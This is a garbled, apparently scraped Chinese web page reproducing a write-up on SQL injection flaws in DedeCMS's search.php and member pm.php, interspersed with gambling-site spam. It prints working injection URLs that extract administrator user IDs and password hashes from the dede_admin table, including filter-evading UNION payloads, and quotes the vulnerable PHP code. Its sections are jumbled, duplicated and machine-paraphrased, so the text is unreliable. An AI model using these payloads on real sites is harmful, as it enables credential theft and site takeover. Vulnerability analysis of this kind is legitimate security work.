xml地图|网站地图|网站标签 [设为首页] [加入收藏]

注入漏洞利用EXP

来源:http://www.ccidsi.com 作者:集成介绍 人气:191 发布时间:2019-07-03
摘要:3. 纰漏影响范围 4. 破绽代码剖析 webshell.cc/plus/search.php?keyword=astypeArr[111=@`'`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),1,62

3. 纰漏影响范围
4. 破绽代码剖析


webshell.cc/plus/search.php?keyword=as&typeArr[111=@`'`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),1,62)))a from information_schema.tables group by a)b)#@`'` ]=a

 

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #

看结果一旦提示

includearc.searchview.class.php

catalog

Safe Alert: Request Error step 1 皇家88娱乐网,!

http://www.2cto.com/Article/201301/184105.html
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

皇家88娱乐网 1

plussearch.php

0x1: POC1

看结果一旦提醒

 

6. 进攻和防守考虑

 

plussearch.php

1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考

Safe Alert: Request Error step 2 !

...  //php5构造函数  function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)  {      global $cfg_search_max,$cfg_search_maxrc,$cfg_search_time;      if(empty($upagesize))      {          $upagesize = 10;      }      //直接赋值      $this->TypeID = $typeid;      ..  }  ..
http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2 /*!50000Union*/ /*!50000select*/ 1,2,3,4,5,6,userid,8,9,10,11,pwd from `dede_admin`#

皇家88娱乐网 2

function __construct($typeid,$keyword,$orderby,$achanneltype="all", $searchtype='',$starttime=0,$upagesize=20,$kwtype=1,$mid=0)  {          ..          $this->TypeID = $typeid;          ...          else          {          //将可能包含黑客注入畸形字符的$this->TypeID直接带入SQL查询          $row =$this->dsql->GetOne("SELECT channeltype FROM `dede_arctype` WHERE id={$this->TypeID}");          $this->ChannelTypeid=$row['channeltype'];          }      ..  }  ..
else if($dopost=='read')  {      $sql = "Select * From `dede_member_friends` where  mid='{$cfg_ml->M_ID}' And ftype!='-1'  order by addtime desc limit 20";      $friends = array();      $dsql->SetQuery($sql);      $dsql->Execute();      while ($row = $dsql->GetArray())       {          $friends[] = $row;      }      /* $id过滤 */      $id = intval($id);      /* */       $row = $dsql->GetOne("Select * From `dede_member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");      if(!is_array($row))      {          ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');          exit();      }      $dsql->ExecuteNoneQuery("Update `dede_member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");      $dsql->ExecuteNoneQuery("Update `dede_member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");      include_once(dirname(__FILE__).'/templets/pm-read.htm');      exit();  }
webshell.cc/plus/search.php?keyword=as&typeArr[111=@`'`) UnIon seleCt 1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from `dede_admin`#@`'` ]=a
..  $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;  ..  $sp = new SearchView($typeid,$keyword,$orderby,$channeltype,$searchtype,$starttime,$pagesize,$kwtype,$mid);  ..

***Copyright (c) 2015 LittleHann All rights reserved***

 

//查找栏目信息  if(empty($typeid))  {      ...      //引入栏目缓存并看关键字是否有相关栏目内容      require_once($typenameCacheFile);      //黑客通过本地变量覆盖漏洞改变$typeArr变量的值,进入if判断逻辑      if(isset($typeArr) && is_array($typeArr))      {          //1. 遍历这个全局数组$typeArr,从中取出键值对          foreach($typeArr as $id => $typename)          {              /*              2.    从我们输入的关键字参数$keyword中删除这个全局数组($typeArr)中出现过的值,也就是说,这个$typeArr本来是充当一个敏感关键字的数组的作用              3.    注意,str_replace()返回的是替换后的数组或者字符串              4.    如果检测到了我们规定的关键字($typeArr中保存的值)出现在了我们输出的$keyword参数中,就进行过滤并删除              */              $keywordn = str_replace($typename, ' ', $keyword);              if($keyword != $keywordn)              {                  $keyword = $keywordn;                  //5. 但是在过滤的过程中,却发生了另一个本地变量覆盖,$typeid这个变量会被"直接"带入到后续的SQL查询中                  $typeid = $id;                  break;              }          }      }  }

**Relevant Link**

假使符合规律呈现注解漏洞不设有

catalog

**Relevant Link**


0x2: POC2

0x3: POC3

那便是说直接用上边包车型客车exp


德德cms会员核心注入漏洞

那正是说间接用上边包车型大巴exp

本文由68399皇家赌场发布于集成介绍,转载请注明出处:注入漏洞利用EXP

关键词: 68399皇家赌场

最火资讯